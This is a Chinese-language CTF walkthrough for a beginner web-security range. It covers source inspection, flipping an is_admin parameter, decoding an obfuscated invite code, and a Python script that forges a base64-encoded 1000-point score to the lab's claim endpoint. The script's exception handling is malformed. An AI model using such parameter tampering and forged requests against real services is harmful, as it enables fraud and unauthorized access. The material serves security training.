靶场介绍
青岑 Web 入门靶场对新手友好,涵盖多种常见 Web 安全漏洞类型。建议通过源码分析、抓包修改及 Payload 构造等方式进行练习。
1. Basic
解题思路: 先看源码和抓包,再找注入点和逻辑问题,最后构造 payload 拿 flag。
- Basic: 直接 F12 查看源码获取 flag。
- BASIC_1: 前端被封禁,查看源码获取 flag。
- basic_2: 抓取提交包,发现
is_admin始终为 0,修改参数后获取 flag。 - basic_3: 查看源码,将 JS 代码放入控制台运行得到密码,进而获取 flag。
- basic_4: 查看源码中的数组
_0,将其转换为字符串得到邀请码QCCTF_VIP_2026。 - basic_5: 积分计算在前端,加密函数全局可见。可直接调用页面加密函数伪造 1000 积分发送给后端,或使用自动脚本批量答题领取奖励。
import requests
import json
import base64
def get_flag():
TARGET_URL = "http://docker.qingcen.net:38964/claim"
payload = {"score": 1000}
json_str = json.dumps(payload, separators=(',', ':'))
encrypted_bytes = base64.b64encode(json_str.encode('utf-8'))
encrypted_data = encrypted_bytes.decode('utf-8')
headers = {'Content-Type': 'application/json'}
data = {"data": encrypted_data}
try:
response = requests.post(TARGET_URL, headers=headers, json=data)
res_json = response.json()
if "data" in res_json:
dec_bytes = base64.b64decode(res_json["data"])
dec_str = dec_bytes.decode('utf-8')
result = json.loads(dec_str)
if "flag" in result:
print(result["flag"])
except Exception e:
(e)
